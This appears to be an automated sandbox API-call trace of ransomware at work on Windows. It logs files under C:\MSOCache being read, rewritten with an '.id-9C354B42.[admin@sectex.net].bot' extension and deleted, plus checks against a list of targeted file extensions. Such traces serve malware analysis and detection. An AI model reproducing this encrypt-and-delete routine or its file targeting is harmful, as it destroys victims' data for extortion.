	[0033.552] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.553] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1800) returned 1
	[0033.553] CloseHandle (hObject=0x190) returned 1
	[0033.553] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 0x2020
	[0033.553] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.553] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.553] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.553] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.553] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0033.553] GetLastError () returned 0x0
	[0033.553] ReadFile (in: hFile=0x190, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x708, lpOverlapped=0x0) returned 1
	[0033.555] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x710, lpOverlapped=0x0) returned 1
	[0033.556] ReadFile (in: hFile=0x190, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.556] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0033.556] SetEndOfFile (hFile=0x194) returned 1
	[0033.556] CloseHandle (hObject=0x194) returned 1
	[0033.557] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.557] SetEndOfFile (hFile=0x190) returned 1
	[0033.558] CloseHandle (hObject=0x190) returned 1
	[0033.558] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.558] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 1
	[0033.558] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74
	[0033.558] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74
	[0033.558] lstrlenW (lpString=".doc") returned 4
	[0033.558] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.558] lstrlenW (lpString=".docx") returned 5
	[0033.558] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.558] lstrlenW (lpString=".pdf") returned 4
	[0033.558] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.558] lstrlenW (lpString=".xls") returned 4
	[0033.558] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.558] lstrlenW (lpString=".xlsx") returned 5
	[0033.558] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.558] lstrlenW (lpString=".ppt") returned 4
	[0033.558] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.558] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74
	[0033.559] lstrlenW (lpString=".zip") returned 4
	[0033.559] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.559] lstrlenW (lpString=".rar") returned 4
	[0033.559] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.559] lstrlenW (lpString=".bz2") returned 4
	[0033.559] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.559] lstrlenW (lpString=".7z") returned 3
	[0033.559] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74
	[0033.559] lstrlenW (lpString=".dbf") returned 4
	[0033.559] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74
	[0033.559] lstrlenW (lpString=".1cd") returned 4
	[0033.559] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74
	[0033.559] lstrlenW (lpString=".jpg") returned 4
	[0033.559] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74
	[0033.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74
	[0033.559] lstrlenW (lpString=".doc") returned 4
	[0033.559] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.559] lstrlenW (lpString=".docx") returned 5
	[0033.559] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.559] lstrlenW (lpString=".pdf") returned 4
	[0033.559] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.559] lstrlenW (lpString=".xls") returned 4
	[0033.559] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.559] lstrlenW (lpString=".xlsx") returned 5
	[0033.559] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.559] lstrlenW (lpString=".ppt") returned 4
	[0033.559] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74
	[0033.559] lstrlenW (lpString=".zip") returned 4
	[0033.559] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.560] lstrlenW (lpString=".rar") returned 4
	[0033.560] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.560] lstrlenW (lpString=".bz2") returned 4
	[0033.560] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.560] lstrlenW (lpString=".7z") returned 3
	[0033.560] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74
	[0033.560] lstrlenW (lpString=".dbf") returned 4
	[0033.560] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74
	[0033.560] lstrlenW (lpString=".1cd") returned 4
	[0033.560] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74
	[0033.560] lstrlenW (lpString=".jpg") returned 4
	[0033.560] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.560] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.560] lstrlenW (lpString="Proof.xml") returned 9
	[0033.560] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c
	[0033.796] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1347) returned 1
	[0033.796] CloseHandle (hObject=0x19c) returned 1
	[0033.797] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 0x2020
	[0033.797] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.797] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c
	[0033.797] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.797] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.797] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0033.797] GetLastError () returned 0x0
	[0033.797] ReadFile (in: hFile=0x19c, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x543, lpOverlapped=0x0) returned 1
	[0033.799] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x550, lpOverlapped=0x0) returned 1
	[0033.800] ReadFile (in: hFile=0x19c, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.800] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0033.800] SetEndOfFile (hFile=0x1a0) returned 1
	[0033.800] CloseHandle (hObject=0x1a0) returned 1
	[0033.801] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.801] SetEndOfFile (hFile=0x19c) returned 1
	[0033.801] CloseHandle (hObject=0x19c) returned 1
	[0033.802] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.802] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 1
	[0033.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81
	[0033.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81
	[0033.802] lstrlenW (lpString=".doc") returned 4
	[0033.802] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.802] lstrlenW (lpString=".docx") returned 5
	[0033.802] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1
	[0033.802] lstrlenW (lpString=".pdf") returned 4
	[0033.802] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.802] lstrlenW (lpString=".xls") returned 4
	[0033.802] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.802] lstrlenW (lpString=".xlsx") returned 5
	[0033.802] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1
	[0033.802] lstrlenW (lpString=".ppt") returned 4
	[0033.802] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81
	[0033.802] lstrlenW (lpString=".zip") returned 4
	[0033.802] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.802] lstrlenW (lpString=".rar") returned 4
	[0033.803] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.803] lstrlenW (lpString=".bz2") returned 4
	[0033.803] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.803] lstrlenW (lpString=".7z") returned 3
	[0033.803] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81
	[0033.803] lstrlenW (lpString=".dbf") returned 4
	[0033.803] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81
	[0033.803] lstrlenW (lpString=".1cd") returned 4
	[0033.803] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81
	[0033.803] lstrlenW (lpString=".jpg") returned 4
	[0033.803] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81
	[0033.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81
	[0033.803] lstrlenW (lpString=".doc") returned 4
	[0033.803] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.803] lstrlenW (lpString=".docx") returned 5
	[0033.803] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1
	[0033.803] lstrlenW (lpString=".pdf") returned 4
	[0033.803] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.803] lstrlenW (lpString=".xls") returned 4
	[0033.803] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.803] lstrlenW (lpString=".xlsx") returned 5
	[0033.803] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1
	[0033.803] lstrlenW (lpString=".ppt") returned 4
	[0033.803] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81
	[0033.803] lstrlenW (lpString=".zip") returned 4
	[0033.803] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.803] lstrlenW (lpString=".rar") returned 4
	[0033.803] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.804] lstrlenW (lpString=".bz2") returned 4
	[0033.804] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.804] lstrlenW (lpString=".7z") returned 3
	[0033.804] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.804] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81
	[0033.804] lstrlenW (lpString=".dbf") returned 4
	[0033.804] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.804] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81
	[0033.804] lstrlenW (lpString=".1cd") returned 4
	[0033.804] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.804] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81
	[0033.804] lstrlenW (lpString=".jpg") returned 4
	[0033.804] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.804] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.804] lstrlenW (lpString="Setup.xml") returned 9
	[0033.804] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c
	[0033.804] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=2362) returned 1
	[0033.804] CloseHandle (hObject=0x19c) returned 1
	[0033.804] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0033.804] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.805] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c
	[0033.805] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.805] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.805] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0033.805] GetLastError () returned 0x0
	[0033.805] ReadFile (in: hFile=0x19c, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x93a, lpOverlapped=0x0) returned 1
	[0033.807] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x940, lpOverlapped=0x0) returned 1
	[0033.807] ReadFile (in: hFile=0x19c, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.808] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0033.808] SetEndOfFile (hFile=0x1a0) returned 1
	[0033.808] CloseHandle (hObject=0x1a0) returned 1
	[0033.808] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.808] SetEndOfFile (hFile=0x19c) returned 1
	[0033.809] CloseHandle (hObject=0x19c) returned 1
	[0033.809] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.810] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0033.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.810] lstrlenW (lpString=".doc") returned 4
	[0033.810] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.810] lstrlenW (lpString=".docx") returned 5
	[0033.810] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.810] lstrlenW (lpString=".pdf") returned 4
	[0033.810] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.810] lstrlenW (lpString=".xls") returned 4
	[0033.810] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.810] lstrlenW (lpString=".xlsx") returned 5
	[0033.810] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.810] lstrlenW (lpString=".ppt") returned 4
	[0033.810] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.810] lstrlenW (lpString=".zip") returned 4
	[0033.810] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.810] lstrlenW (lpString=".rar") returned 4
	[0033.810] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.810] lstrlenW (lpString=".bz2") returned 4
	[0033.810] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.810] lstrlenW (lpString=".7z") returned 3
	[0033.810] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.810] lstrlenW (lpString=".dbf") returned 4
	[0033.810] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.811] lstrlenW (lpString=".1cd") returned 4
	[0033.811] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.811] lstrlenW (lpString=".jpg") returned 4
	[0033.811] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.811] lstrlenW (lpString=".doc") returned 4
	[0033.811] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.811] lstrlenW (lpString=".docx") returned 5
	[0033.811] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.811] lstrlenW (lpString=".pdf") returned 4
	[0033.811] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.811] lstrlenW (lpString=".xls") returned 4
	[0033.811] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.811] lstrlenW (lpString=".xlsx") returned 5
	[0033.811] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.811] lstrlenW (lpString=".ppt") returned 4
	[0033.811] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.811] lstrlenW (lpString=".zip") returned 4
	[0033.811] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.811] lstrlenW (lpString=".rar") returned 4
	[0033.811] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.811] lstrlenW (lpString=".bz2") returned 4
	[0033.811] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.811] lstrlenW (lpString=".7z") returned 3
	[0033.811] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.811] lstrlenW (lpString=".dbf") returned 4
